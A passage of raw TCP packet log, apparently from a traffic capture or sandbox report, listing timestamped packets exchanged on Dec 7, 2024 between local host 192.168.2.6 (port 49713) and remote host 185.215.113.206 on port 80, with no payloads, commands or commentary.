Dec 7, 2024 10:51:17.956681967 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.958303928 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.958379030 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.958451986 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.958498955 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.960002899 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.960051060 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.960182905 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.960227966 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.961488962 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.961544991 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.961647034 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.961682081 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.963044882 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.963085890 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.963143110 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.964557886 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.964621067 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.964658976 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.964761019 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.966114044 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.966171980 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.966213942 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.966367006 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.967592001 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.967644930 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.967737913 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.967786074 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.969100952 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.969172955 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.969212055 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.969329119 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.970583916 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.970597029 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.970638037 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.971995115 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.972064972 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.972157001 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.972299099 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.973401070 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.973464012 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.973521948 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.973623037 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.974802971 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.974889994 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.974930048 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.975186110 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.976300001 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.976356030 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:17.976418018 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:17.976469994 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.011712074 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.011725903 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.011826992 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.011826992 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.012289047 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.012339115 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.012371063 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.012537956 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.013576031 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.013628006 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.013648033 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.013850927 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.014740944 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.014853954 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.014854908 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.014897108 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.016046047 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.016092062 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.016161919 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.016206026 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.017206907 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.017256975 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.017369032 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.017421007 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.018440962 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.018526077 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.018533945 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.018582106 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.019710064 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.019783974 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.019820929 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.019881964 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.020919085 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.020991087 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.021075010 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.021239996 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.022066116 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.022115946 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.022197008 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.022393942 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.023363113 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.023416996 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.023451090 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.023497105 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.024491072 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.024561882 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.024622917 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.024669886 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.025731087 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.025789022 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.025861979 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.025904894 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.026870012 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.026911974 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.027002096 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.027053118 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.028078079 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.028131008 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.028214931 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.028264999 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.029335022 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.029375076 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.029386044 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.029422998 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.030538082 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.030585051 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.030659914 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.030709982 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.031713009 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.031768084 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.031815052 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.031867027 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.032907963 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.033023119 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.033058882 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.033060074 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.034102917 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.034166098 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.034204960 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.034249067 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.079566002 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.079649925 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.079698086 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.079850912 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.080188990 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.080245972 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.080302000 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.080348969 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.081383944 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.081442118 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.081494093 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.081588984 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.082643032 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.082691908 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.082720995 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.082772017 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.083820105 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.083893061 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.083937883 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.084019899 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.085031986 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.085115910 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.085151911 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.085246086 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.086232901 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.086302996 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.086348057 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.086389065 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.087424994 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.087460995 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.087491989 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.087507963 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.088618994 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.088679075 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.088726044 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.088778973 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.089833021 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.089895964 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.089927912 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.089966059 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.133375883 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.133491993 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.133575916 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.134005070 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.134059906 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.134097099 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.134144068 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.135178089 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.135237932 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.135327101 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.135374069 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.136378050 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.136457920 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.136761904 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.136811018 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.136877060 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.137124062 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.137960911 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.138021946 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.138070107 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.138114929 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.139156103 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.139209032 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.139225006 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.139272928 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.140358925 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.140511990 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.140574932 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.141573906 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.141669989 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.141669989 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.141711950 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.142756939 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.142813921 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.142859936 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.142901897 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.144071102 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.144128084 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.144134998 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.144201994 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.145210981 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.145266056 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.145284891 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.145382881 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.146392107 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.146486998 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.146511078 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.146548033 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.147588968 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.147638083 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.147708893 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.147857904 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.148835897 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.148891926 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.148936033 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.148981094 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.150367022 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.150487900 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.150569916 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.150666952 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.151352882 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.151397943 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.151520014 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.151560068 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.152498007 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.152545929 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.152586937 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.152667999 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.153472900 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.153520107 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.153615952 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.153781891 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.154628038 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.154680014 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.154795885 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.154854059 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.155756950 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.155829906 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.155869961 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.155915022 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.156820059 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.156893015 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.156938076 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.156996012 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.157886028 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.157947063 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.158013105 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.158068895 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.158932924 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.159018040 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.159041882 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.159082890 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.277808905 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.277976036 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.278660059 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.278682947 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.278696060 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.278711081 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.278744936 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.397404909 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.397422075 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.397459030 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.397494078 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.398308039 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.398322105 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.398363113 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.398376942 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.517129898 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517147064 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517160892 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517195940 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517209053 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517220020 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517229080 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.517231941 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517249107 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517260075 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.517261982 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517276049 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517282963 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.517291069 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517297029 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.517306089 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517314911 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.517319918 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517343044 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.517368078 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.517546892 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517559052 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517594099 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.517606974 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.517682076 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517709970 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517723083 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517731905 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.517748117 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.517767906 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.517782927 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517796993 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517807961 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517822027 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517834902 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517853975 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517868996 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517875910 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.517883062 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.517909050 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.517921925 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.518512964 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.518527985 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.518539906 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.518553019 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.518559933 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.518568039 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.518570900 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.518589020 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.518603086 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.518625975 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.518629074 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.518640041 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.518651009 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.518660069 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.518666983 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.518675089 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.518688917 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.518692017 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.518702030 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.518713951 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.518717051 CET	49713	80	192.168.2.6	185.215.113.206
